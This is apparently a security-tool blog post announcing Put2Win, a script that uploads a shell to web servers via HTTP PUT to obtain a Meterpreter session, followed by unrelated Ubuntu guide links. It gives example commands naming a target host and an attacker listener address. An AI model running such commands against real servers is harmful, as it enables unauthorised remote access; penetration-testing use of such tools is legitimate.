Categories: Kali Linux

Put2Win – Script To Automatize Shell Upload By PUT HTTP Method To Get Meterpreter

Put2Win is a script to automatize shell upload by PUT HTTP method to get meterpreter. It’s necessary to have installed nmap and msfvenom tools for a correct operation.

Also ReadJoomscan – OWASP Joomla Vulnerability Scanner Project

Put2Win Usage

./Put2win.sh -h

This script automatize shell upload by PUT HTTP method to get meterpreter.

Usage: ./Put2win.sh -t TARGET [-p PORT] -u URL_PATH -l LHOST

Examples:

./Put2win.sh -t 192.168.1.80 -u /uploads -l 192.168.1.10
./Put2win.sh -t 192.168.1.80 -p 443 -u /uploads -l 192.168.1.10

Credit: @devploit

R K

Recent Posts

Set Up Nginx Server Blocks on Ubuntu 18.04: Host Multiple Sites

Nginx server blocks let you run more than one website on a single server. Each block…

7 hours ago

Install Tor Browser on Ubuntu 18.04: Anonymous Browsing Guide

Tor Browser is a modified version of Firefox that routes all your web traffic through the Tor…

8 hours ago

Install Vagrant on Ubuntu 18.04: Complete Setup Guide for Developers

Vagrant is a command-line tool that makes it easy to build and manage virtual machine environments.…

9 hours ago

Install VMware Tools on Ubuntu 18.04: Open VM Tools and ISO Guide

VMware Tools is a set of drivers and services that improves the performance of an Ubuntu…

9 hours ago

Install Apache Maven on Ubuntu 18.04: Stable or Latest Version

Java developers use project management tools to automate building their applications. Apache Maven is an open source…

9 hours ago

Install Mono on Ubuntu 18.04: C# Compiler and Runtime Guide

Running programs built for Microsoft's framework on a Linux system is easier than you think. Mono is…

1 day ago